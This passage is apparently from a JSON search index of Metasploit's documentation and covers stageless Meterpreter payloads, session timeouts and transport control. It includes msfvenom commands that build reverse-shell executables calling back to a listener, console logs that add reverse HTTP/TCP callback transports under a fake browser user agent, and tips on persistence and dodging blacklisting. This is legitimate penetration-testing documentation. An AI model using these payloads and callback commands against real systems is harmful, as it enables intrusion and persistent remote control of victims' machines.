Meterpreter session 4684 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4685 opened .... 
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4686 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4687 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4688 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4689 opened .... In such a scenario, it would be better to have the ability to create a stage0 which includes metsrv and any number of Meterpreter extensions. This means that the payload already includes the important part of the Meterpreter functionality, along with all the features that the attacker might require. When invoked, the Meterpreter instance already has all it needs to function, and hence Metasploit doesn’t need to waste time or bandwidth performing the usual uploads that are required with the staged approach. Stageless Meterpreter is exactly that. It is a binary that includes all of the required parts of Meterpreter, along with any required extensions, all bundled into one. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#whats-wrong-with-staged-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#whats-wrong-with-staged-meterpreter"
  },"639": {
    "doc": "Stageless Mode",
    "title": "What does stageless Meterpreter look like?",
    "content": "As with the staged version, stageless Meterpreter payloads begin with a small bootstrapper. However, this bootstrapper looks very different. Staged Meterpreter payload bootstrappers contain shellcode that performs network communications in order to read in the second stage prior to invoking it. The stageless counterparts don’t have this responsibility, as it is instead handled by metsrv itself. As a result, what we know as stage0 completely disappears. Instead, that which is known as stage1 in staged Meterpreter land becomes the bootstrapper for the payload in stageless Meterpreter land. To make this clear, let’s take a look at the process. When creating the payload, Metasploit first reads a copy of the metsrv DLL into memory. It then overwrites the DLL’s DOS header with a selection of shellcode that does the following: . | Performs a simple GetPC routine. | Calculates the location of the ReflectiveLoader() function in metsrv. | Invokes the ReflectiveLoader() function in metsrv. | Calculates the location of the start of a custom Configuration Block that contains information about transports, extensions and extension-specific initialisation scripts. This configuration block appears in memory immediately after metsrv. | Invokes DllMain() on metsrv, passing in DLL_METASPLOIT_ATTACH along with the pointer to the configuration block. This is where metsrv takes over. | . With this shellcode stub wired into the DOS header, Metasploit adds the entire binary blob to an in-memory payload buffer and then iterates through the list of chosen extensions. For each extension that is specified, Metasploit does the following: . | Loads the extension DLL into memory. | Calculates the size of the DLL. | Writes the size of the DLL as a 32-bit value to the configuration block. | Writes the entire body of the DLL, as-is, to the end of the configuration block. | . 
Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of 0 (NULL) which indicates that the list of extensions has been terminated. This NULL value is what metsrv will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that’s beyond the scope of this article). The final payload layout, from start to end, looks like the following: . [ bootstrap shellcode ] [ metsrv ] [ Configuration Block: session and transport config | Size | ext 1 | Size | ext 2 | ... | ext inits | NULL ] . This payload can be embedded in an exe file, encoded, thrown into an exploit (assuming there’s room!), and who knows what else! The important thing is that we now have all of the bits that we need in the one payload. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-does-stageless-meterpreter-look-like",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-does-stageless-meterpreter-look-like"
  },"640": {
    "doc": "Stageless Mode",
    "title": "How do I use stageless Meterpreter?",
    "content": "Firstly, it has a different name! It follows the same convention as all of the other staged vs stageless payloads: . | Payload | Staged | Stageless | . | Reverse TCP | windows/meterpreter/reverse_tcp | windows/meterpreter_reverse_tcp | . | Reverse HTTPS | windows/meterpreter/reverse_https | windows/meterpreter_reverse_https | . | Bind TCP | windows/meterpreter/bind_tcp | windows/meterpreter_bind_tcp | . | Reverse TCP IPv6 | windows/meterpreter/reverse_ipv6_tcp | windows/meterpreter_reverse_ipv6_tcp | . To create a payload using one of these, you use msfvenom just like you would for any other payload. To make a stageless payload that contains only metsrv we do the following: . $ ./msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4444 -f exe -o stageless.exe . To add extensions to the payload, we can make use of the EXTENSIONS parameter, which takes a comma-separated list of extension names. $ ./msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4444 EXTENSIONS=stdapi,priv -f exe -o stageless.exe . With a payload created, we can set up a listener which will handle the connection using msfconsole. Note that the EXTENSIONS parameter isn’t set in the handler. This is because the handler isn’t responsible for them, as they’re already in the payload binary. When a session is established, you’ll also note the lack of the “Sending stage …” message! This shows that the upload of stage1 didn’t happen, as it’s not needed. If the payload that was invoked also contained stdapi and priv, then absolutely no uploads have occurred at this point. Congratulations, you’re dancing with stageless Meterpreter! . At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-side wiring of any of the pre-loaded extensions, the user can just type use &amp;lt;extension&amp;gt; just like they used to. 
Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done. If you’re working with meterpreter_reverse_https, you’ll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can’t and won’t look any different to an old session that hasn’t been in touch with Metasploit for a while. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#how-do-i-use-stageless-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#how-do-i-use-stageless-meterpreter"
  },"641": {
    "doc": "Stageless Mode",
    "title": "Stageless Mode",
    "content": "Metasploit has long supported a mixture of staged and stageless payloads within its toolset. The mixture of payloads gives penetration testers a huge collection of options to choose from when performing exploitation. However, one option has been missing from this collection, and that is the notion of a stageless Meterpreter payload. In this post, I’d like to explain what this means, why you should care, and show how the latest update to Metasploit and Meterpreter provides this funky new feature as portended by Tod’s last Wrapup post. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html"
  },"642": {
    "doc": "Timeout Control",
    "title": "Meterpreter’s Timeout Values",
    "content": "There are four timeout values that can be controlled by the user, and they are documented in the sections below. Meterpreter Session Timeout . Each instance of Meterpreter has a lifetime that is defined as a session. The length of Meterpreter’s life is defined by a parameter called the Session Timeout. This value can be specified when Meterpreter payloads are generated by using the SessionExpirationTimeout datastore option. The default value used is the equivalent of one whole week (604800 seconds), and hence this is what is used if the user does not override the value manually. The session’s life begins at the point that metsrv (Meterpreter’s core) takes over from the initial stage (if there is one). Once running, the session timer begins, and Meterpreter will monitor this timeout so that as soon as it is reached the session will be closed. If the timeout value is set to zero, this tells Meterpreter to never kill the session. If you’re looking to have Meterpreter run for as long as it can, then setting this value to zero is the way to do it. It’s important to note that this value lives outside of the realms of the other timeout values. That is, this value applies to Meterpreter as a whole, where the other three timeouts are specific to the individual transports that have been configured within the session. Meterpreter Transport Timeouts . Each transport that is configured inside Meterpreter has three timeouts. They are as follows: . Communication Timeout . When Meterpreter talks to Metasploit, packets are exchanged at a low level in a request/response fashion. In the case of TCP transports, this req/rep pattern is basically instant because TCP is a persistent connection. A request is handled by Meterpreter, and the response is immediately transferred as soon as the command has finished executing. In the case of HTTP/S payloads it’s slightly different because the protocols are stateless. 
Meterpreter makes a GET request to Metasploit to check to see if a command has been executed by the user. The command is returned, the connection is closed, and Meterpreter executes the command asynchronously. When the command execution finishes, a second request is made that POSTs the result back to Metasploit so that the user can consume it. Hence, for each command invocation, there are two HTTP/S requests. With TCP transports, communication “times out” when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn’t cause the socket to completely disconnect. With HTTP/S transports, the communication “times out” for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a GET request results in no acknowledgement. By default, this value is set to 300 seconds (5 minutes), but can be overridden by the user via the SessionCommunicationTimeout setting. If connectivity fails, or the communication is deemed to have timed out, then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit. Retry Total and Retry Wait . After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can’t connect to Metasploit, it will attempt to retry for a period of time. 
Once that period of time expires, Meterpreter will deem this transport “dead” and will move to the next one in the transport list. The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the retry total value. That is, retry total is the total amount of time that Meterpreter will retry communication on the transport. The default value is 3600 seconds (1 hour), and can be overridden via the SessionRetryTotal setting. While the current time is within the retry total time, Meterpreter will constantly attempt to establish connectivity. If it fails, it will wait for a period of time before trying again. The time between retry attempts on the current transport is called retry wait. That is, Meterpreter will wait for the number of seconds specified in retry wait between each connection attempt on the current transport. The default value is 10 seconds, and can be overridden via the SessionRetryWait setting. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#meterpreters-timeout-values",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#meterpreters-timeout-values"
  },"643": {
    "doc": "Timeout Control",
    "title": "Changing Timeouts",
    "content": "Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the get_timeouts command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below: . meterpreter &amp;gt; get_timeouts Session Expiry : @ 2015-06-09 19:56:05 Comm Timeout : 100000 seconds Retry Total Time: 50000 seconds Retry Wait Time : 2500 seconds . The Session Expiry value is rendered as an absolute local time so that the user knows when the session is due to expire. In order to update these values, users can invoke the set_timeouts command. Invoking it without parameters shows the help: . meterpreter &amp;gt; set_timeouts Usage: set_timeouts [options] Set the current timeout options. Any or all of these can be set at once. OPTIONS: -c &amp;lt;opt&amp;gt; Comms timeout (seconds) -h Help menu -t &amp;lt;opt&amp;gt; Retry total time (seconds) -w &amp;lt;opt&amp;gt; Retry wait time (seconds) -x &amp;lt;opt&amp;gt; Expiration timeout (seconds) . As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command is optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made. In the case of the -x parameter, the value that is to be passed in should represent the total number of seconds from “now” until the session should expire. The following example updates the session expiration timeout to be 2 minutes from “now”, and changes the retry total time to 3 seconds: . meterpreter &amp;gt; set_timeouts -x 120 -t 3 Session Expiry : @ 2015-06-02 22:45:13 Comm Timeout : 100000 seconds Retry Total Time: 3 seconds Retry Wait Time : 2500 seconds . 
This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Meterpreter will shut down and it’s game over: . meterpreter &amp;gt; [*] 10.1.10.35 - Meterpreter session 2 closed. Reason: Died . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#changing-timeouts",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#changing-timeouts"
  },"644": {
    "doc": "Timeout Control",
    "title": "Timeout Control",
    "content": "It is now possible to meticulously control a set of timeout-related behaviour in Meterpreter sessions. Timeouts may not seem important, but they change the noise levels of Meterpreter’s communication resiliency features, and allow for the extension/reduction of time of the Meterpreter session as a whole. This document details what those timeouts are, and how to control them. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html"
  },"645": {
    "doc": "Transport Control",
    "title": "On this page",
    "content": ". | Transport configuration | The transport command . | Listing transports | Adding transports | Changing transports | Removing transports | Resilient transports | . | Supported Meterpreters | . The Meterpreter that we have known and loved for years has always had the ability to specify the type of transport that is to be used for the session. reverse_tcp and reverse_https are the favorites. Previously, the flexibility for transport selection was only available at the time the payloads were created, or when the exploit was launched, effectively locking the Meterpreter session into a single type of transport for the lifetime of the session. Recent modifications to Meterpreter have changed this. Meterpreter has a new configuration system that supports multiple transports and it now supports the addition of new transports while the session is still running. With the extra transports configured, Meterpreter allows the user to cycle through those transports without shutting down the session. | Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the Meterpreter Reliable Network Communication documentation. | . This document describes how multiple transports are added to an existing Meterpreter session. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#on-this-page"
  },"646": {
    "doc": "Transport Control",
    "title": "Transport configuration",
    "content": "It is not possible to add multiple transports to payloads or exploits prior to launching them. This is due to the fact that msfvenom and the built-in payload mechanisms in Metasploit need to be modified to allow for multiple transports to be selected prior to the generation of the payload. This work is ongoing, and hopefully, it’ll be implemented soon. For now, a single transport has to be chosen, using the same mechanism that has always been in use. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#transport-configuration",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#transport-configuration"
  },"647": {
    "doc": "Transport Control",
    "title": "The transport command",
    "content": "Meterpreter has a new base command called transport. This is the hub of all transport-related commands and will allow you to list them, add new ones, cycle through them on the fly, and remove those which are no longer valid or useful. The following output shows the current help text for the transport command: . meterpreter &amp;gt; transport Usage: transport &amp;lt;list|change|add|next|prev|remove&amp;gt; [options] list: list the currently active transports. add: add a new transport to the transport list. change: same as add, but changes directly to the added entry. next: jump to the next transport in the list (no options). prev: jump to the previous transport in the list (no options). remove: remove an existing, non-active transport. OPTIONS: -A &amp;lt;opt&amp;gt; User agent for HTTP/S transports (optional) -B &amp;lt;opt&amp;gt; Proxy type for HTTP/S transports (optional: http, socks; default: http) -C &amp;lt;opt&amp;gt; Comms timeout (seconds) (default: same as current session) -H &amp;lt;opt&amp;gt; Proxy host for HTTP/S transports (optional) -N &amp;lt;opt&amp;gt; Proxy password for HTTP/S transports (optional) -P &amp;lt;opt&amp;gt; Proxy port for HTTP/S transports (optional) -T &amp;lt;opt&amp;gt; Retry total time (seconds) (default: same as current session) -U &amp;lt;opt&amp;gt; Proxy username for HTTP/S transports (optional) -W &amp;lt;opt&amp;gt; Retry wait time (seconds) (default: same as current session) -X &amp;lt;opt&amp;gt; Expiration timeout (seconds) (default: same as current session) -c &amp;lt;opt&amp;gt; SSL certificate path for https transport verification (optional) -h Help menu -i &amp;lt;opt&amp;gt; Specify transport by index (currently supported: remove) -l &amp;lt;opt&amp;gt; LHOST parameter (for reverse transports) -p &amp;lt;opt&amp;gt; LPORT parameter -t &amp;lt;opt&amp;gt; Transport type: reverse_tcp, reverse_http, reverse_https, bind_tcp -u &amp;lt;opt&amp;gt; Local URI for HTTP/S transports (used when 
adding/changing transports with a custom LURI) -v Show the verbose format of the transport list . Listing transports . The simplest of all the sub-commands in the transport set is list. This command shows the full list of currently enabled transports, and an indicator of which one is the “current” transport. The following shows the non-verbose output with just the default transport running: . meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 . The first part of the output is the session expiry time. To learn more about expiry time, see the Meterpreter Timeout Control documentation. The above output shows that we have one transport enabled that is using TCP. We can infer that the transport was a reverse_tcp (rather than bind_tcp) due to the fact that there is a host IP address in the transport URL. If it was a bind_tcp, this would be blank. Comms T/O refers to the communications timeout value. Retry Total is the total time to attempt reconnects on this transport, and Retry Wait indicates how often a retry of the current transport should happen. Each of these is documented in depth in the Timeout documentation. The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as reverse_http/s). The following command shows the output of the list sub-command with the verbose flag (-v) after an HTTP transport has been added: . meterpreter &amp;gt; transport list -v Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait User Agent Proxy Host Proxy User Proxy Pass Cert Hash ---- --- --------- ----------- ---------- ---------- ---------- ---------- ---------- --------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1 . 
Adding transports . Adding transports gives Meterpreter the ability to work on different transport mechanisms with the goal of keeping the sessions alive for longer. The command for adding new transports varies slightly depending on the transport that is being added. The following command shows a simple example that adds a reverse_http transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests: . meterpreter &amp;gt; transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A \"Totes-Legit Browser/1.1\" [*] Adding new transport ... [+] Successfully added reverse_http transport. This command is what was used to create the transport that was listed in the sample verbose output for the transport list command. Here’s a deeper explanation of the parameters: . | The -t option is what tells Metasploit what type of transport to add. The options are bind_tcp, reverse_tcp, reverse_http and reverse_https. These match those that are used for the construction of the original payloads. Given that we are not dealing with stages, there is no reverse_winhttps because Meterpreter always uses the WinHTTP API behind the scenes anyway. | The -l option specifies what we all know as the LHOST parameter. | The -p option specifies what we all know as the LPORT parameter. | The -T option matches the retry total parameter. The measure of this value is in seconds, and should be a positive integer that is more than -W. | The -W option matches the retry wait parameter. The measure of this value is in seconds and should be a positive integer that is less than -T. | The -C option matches the communication timeout. The measure of this value is in seconds and should be a positive integer. | The -A option specifies a custom user agent that is used for HTTP requests. | . It is also possible to specify the following: . 
| The -u option allows the addition of a local URI (LURI) value that is prepended to the UUID URI that is used for all requests. This URI value helps segregate listeners and payloads based on a URI. | The -H option specifies a proxy host/IP. This parameter is optional. | The -B option specifies a proxy type, and needs to be set to http or socks. If not specified alongside the -H parameter, the default type is http. | The -P option specifies the port that the proxy is listening on. This should be set when -H is set. | The -U option specifies the username to use to authenticate with the proxy. This parameter is optional. | The -N option specifies the password to use to authenticate with the proxy. This parameter is optional. | The -X option specifies the overall Meterpreter session timeout value. While this value is not transport-specific, the option is provided here so that it can be set alongside the other transport-specific timeout values for ease of use. | Finally, the -c parameter can be used to indicate the expected SSL certificate. This parameter expects a file path to an SSL certificate in PEM format. The SHA1 hash of the certificate is extracted from the file, and this is used during the request validation process. If this file doesn’t exist or doesn’t contain a valid certificate, then the request should fail. | . The following shows another example which adds another reverse_tcp transport to the transport list: . meterpreter &amp;gt; transport add -t reverse_tcp -l 10.1.10.40 -p 5005 [*] Adding new transport ... [+] Successfully added reverse_tcp transport. meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 . 
Note that these examples only add new transports; they do not change the current transport mechanism. When a transport is added to the list of transports, it is always added at the end of the list, and not the start. Change transports . There are three different ways to change transports. One thing they do have in common is that transport switching assumes that you have listeners set up to receive the connections. If no listener or handler is present, then the resiliency features in Meterpreter will cause it to constantly attempt to establish connectivity on that transport using the transport timeout values that were configured. If the transport ultimately fails, then Meterpreter will cycle to the next transport on the list and try again. This will continue until a transport connection is successful, or the session timeout expires. More information on this can be found in the session resiliency documentation (link coming soon). The three different ways to change transports are: . | transport next - This command will cause Meterpreter to shut down the current transport, and attempt to reconnect to Metasploit using the next transport in the list of transports. | transport prev - This command is the same as transport next, except that it will move to the previous transport on the list, and not the next one. | transport change ... - This command is equivalent to running transport add, and requires all the parameters that transport add requires (resulting in a new transport at the end of the list), and then transport prev (which is the same as going from the start of the list to the end). The net effect is the same as creating a new transport and immediately switching to it. | . As an example, here is the current transport setup: . 
meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 . Moving to the next transport: . meterpreter &amp;gt; transport next [*] Changing to next transport ... [+] Successfully changed to the next transport, killing current session. [*] 10.1.10.35 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] 10.1.10.40:46130 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [*] Meterpreter session 2 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46130) at 2015-06-02 20:53:54 +1000 msf exploit(handler) &amp;gt; sessions -i 2 [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . This output shows that we moved from the original reverse_tcp to the reverse_http transport, and this is now the current transport. Moving to the next transport again takes the session to the second reverse_tcp listener: . meterpreter &amp;gt; transport next [*] Changing to next transport ... [+] Successfully changed to the next transport, killing current session. [*] 10.1.10.35 - Meterpreter session 2 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 3 opened (10.1.10.40:5005 -&amp;gt; 10.1.10.35:49277) at 2015-06-02 20:54:45 +1000 msf exploit(handler) &amp;gt; sessions -i 3 [*] Starting interaction with 3... 
meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:06 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 . From here, moving backward sends Meterpreter back to the reverse_http listener: . meterpreter &amp;gt; transport prev [*] Changing to previous transport ... [*] 10.1.10.40:46245 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [+] Successfully changed to the previous transport, killing current session. [*] 10.1.10.35 - Meterpreter session 3 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 4 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46245) at 2015-06-02 20:55:07 +1000 msf exploit(handler) &amp;gt; sessions -i 4 [*] Starting interaction with 4... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . Remove transports . It is also possible to remove transports from the underlying transport list. This is valuable in cases where you want Meterpreter to always call back on stageless listeners (allowing you to avoid the unnecessary upload of the second stage), or when you have a listener located at an IP address that may have been blacklisted by your target as a result of your post-exploitation shenanigans. The command is similar to add in that it takes a subset of the parameters, and then adds a new one on top of it: . | -t - The transport type. | -l - The LHOST value (unless it’s bind_tcp). | -p - The LPORT value. 
| -u - This value is only required for reverse_http/s transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions. | . [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-07-10 07:39:08 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5000 300 3600 10 http://10.1.10.40:9090/jYGS61OX8On-Dv8Pq5v9FAJAEobAlrL4J2FBOf_3DsnZzCJAY6-Dh_8AeWdrkFwRbQdvz4vOo8let4huygVLPJ/ 300 3600 10 meterpreter &amp;gt; transport remove -t reverse_http -l 10.1.10.40 -p 9090 -u jYGS61OX8On-Dv8Pq5v9FAJAEobAlrL4J2FBOf_3DsnZzCJAY6-Dh_8AeWdrkFwRbQdvz4vOo8let4huygVLPJ [*] Removing transport ... [+] Successfully removed reverse_http transport. meterpreter &amp;gt; transport list Session Expiry : @ 2015-07-10 07:39:08 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5000 300 3600 10 meterpreter &amp;gt; . Resilient transports . Previously, Meterpreter only had built-in resiliency in the HTTP/S payloads and this was due to the nature of HTTP/S as a stateless protocol. Meterpreter now has resiliency features baked into TCP transports as well, both reverse and bind. If communication fails on a given transport, Meterpreter will roll over to the next one automatically. The following shows Metasploit being closed and leaving the existing TCP session running behind the scenes: . meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 meterpreter &amp;gt; background [*] Backgrounding session 5... 
msf exploit(handler) &amp;gt; exit -y . With Metasploit closed, the Meterpreter session has detected that the transport is no longer functioning. Behind the scenes, Meterpreter has shut down this TCP transport, and has automatically moved over to the HTTP transport as this was the next transport in the list. From here, Meterpreter continues to try to re-establish connectivity with Metasploit on this transport as per the transport timeout settings. The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically: ./msfconsole -r ~/msf.rc [*] Starting the Metasploit Framework console...| IIIIII dTb.dTb _.---._ II 4' v 'B .'\"\".'/|\\`.\"\"'. II 6.P : .' / | \\ `. : II 'T;.;P' '.' / | \\ `.' II 'T; ;P' `. / | \\ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]] + -- --=[ 1460 exploits - 835 auxiliary - 229 post ] + -- --=[ 426 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] ... snip ... [*] 10.1.10.40:46457 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [*] Meterpreter session 1 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46457) at 2015-06-02 21:03:55 +1000 msf exploit(handler) &amp;gt; sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-S45GUQ5KGVK\\OJ @ WIN-S45GUQ5KGVK 10.1.10.40:5105 -&amp;gt; 10.1.10.40:46457 (10.1.10.35) msf exploit(handler) &amp;gt; sessions -i 1 [*] Starting interaction with 1... 
meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . The session is back up and running as if nothing had gone wrong. In the case where Meterpreter is configured with only a single transport mechanism, this process still takes place. Meterpreter’s transport list implementation is a cyclic linked-list, and once the end of the list has been reached, it simply starts from the beginning again. This means that if there’s a list of one transport then Meterpreter will continually attempt to use that one transport until the session expires. This works for both TCP and HTTP/S. For important detail on network resiliency, please see the reliable network communication documentation. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#the-transport-command",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#the-transport-command"
  },"648": {
    "doc": "Transport Control",
    "title": "Supported Meterpreters",
    "content": "The following Meterpreter implementations currently support the transport commands: . | Windows x86 | Windows x64 | POSIX x86 | Android | Java | Python | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#supported-meterpreters",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#supported-meterpreters"
  },"649": {
    "doc": "Transport Control",
    "title": "Transport Control",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html"
  },"650": {
    "doc": "Unicode Support",
    "title": "Unicode Support",
